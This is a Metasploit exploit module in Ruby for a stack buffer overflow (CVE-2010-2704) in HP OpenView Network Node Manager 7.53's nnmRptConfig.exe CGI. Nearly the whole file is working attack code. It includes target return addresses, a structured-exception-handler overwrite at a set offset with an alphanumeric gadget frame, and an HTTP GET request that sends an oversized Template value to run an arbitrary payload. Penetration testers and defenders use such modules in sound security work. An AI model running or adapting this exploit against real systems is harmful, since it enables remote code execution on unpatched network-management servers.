##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	HttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/nnmRptConfig.exe', :pattern => /Hewlett-Packard Development Company/ }

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HP OpenView Network Node Manager nnmRptConfig Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53
				prior to NNM_01207 or NNM_01203 with the SSRT100158 hotfix.

=begin
				XXX: NEEDS MORE DESCRIPTION
=end

			} ,
			'Author'         => [ 'jduck' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2010-2704' ],
					[ 'OSVDB', '66507' ],
					[ 'BID', '41839' ],
					[ 'URL', 'http://www.vupen.com/english/advisories/2010/1866' ],
					[ 'URL', 'http://www.attrition.org/pipermail/vim/2010-July/002374.html' ],
					[ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02290344' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024, # buffer size?
					'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric), # (0..0x1f).to_a.pack('C*'),
					#'StackAdjustment' => -3500,
					#'DisableNops'    => true,
					#'EncoderType'    => Msf::Encoder::Type::AlphanumMixed,
					#'EncoderOptions' =>
					#	{
					#		'BufferRegister'  => 'ESP'
					#	},
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'HP OpenView Network Node Manager 7.53',
						{
							'Ret' => 0x5a212a4a # jmp esp in ov.dll (2004-10-05, 294,967 bytes)
						}
					],
					[ 'HP OpenView Network Node Manager 7.53 (Windows 2003)',
						{
							'Ret' => 0x71c02b67 # push esp / ret in ws2_32.dll v5.2.3790.3959
						}
					],
					[ 'Debug Target',
						{
							#'Ret' => 0x5a30575b # int3 in ovwww.dll (2007-09-18, 106,558 bytes)
							'Ret' => 0x71c0782c # int3 in ws2_32.dll v5.2.3790.3959
						}
					]
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jul 20 2010'))

		register_options(
			[
				Opt::RPORT(80),
			], self.class)
	end

	def exploit

		print_status("Trying target #{target.name}...")

=begin
		# sprintf_new(buf, "   HTTP_COOKIE=%s", bigstr);
		start = '   HTTP_COOKIE='
		start << cookie

		# Offsets from the start of the buffer:
		# ebp @ 5120
		# ret @ 5124
		# seh @ 7044

		buf = rand_text_alphanumeric(5124 - start.length)
		buf << [target.ret].pack('V')
		#buf << "\xcc"
		buf << payload.encoded

		cookie << buf
		cookie << ";"
=end

		cgi = '/OvCgi/nnmRptConfig.exe'
		start = 'Unable to locate report template: '

		# The CGI calls exit(0) after triggering the bof, so we must use SEH tekniq!
		seh_offset = 2748 - start.length

		#template = Rex::Text.pattern_create(1024*3)
		template = rand_text(1024*3)

		# Characters allowed: AlphaNumeric + '$-_.'
		seh_frame = "\x71\x30\x41\x41"
		#seh_frame << "B" * 4
		#seh_frame << [0x5a304f74].pack('V') # cc
		seh_frame << [0x5a30706c].pack('V') # pop/pop/ret in ovwww.dll

		#template[seh_offset,8] = generate_seh_record(target.ret)
		template[seh_offset, 8] = seh_frame
		#template[seh_offset,8] = generate_seh_payload(target.ret)

		res = send_request_cgi({
			'uri'		  => cgi,
			'method'	  => "GET",
			'vars_get' =>
				{
					'Content'   => "A" * 10240,
					'Action'    => 'Scheduler',
					'Operation' => 'Stop',
					'Template'  => template,
					# Thanks HP!
					'DebugSpin' => 'yes'
				}
		}, 3)

		if res and res.code != 502
			print_error("Eek! We weren't expecting a response, but we got one")
			#if datastore['DEBUG']
				print_error('')
				print_error(res.inspect)
			#end
		end

		handler

	end

end
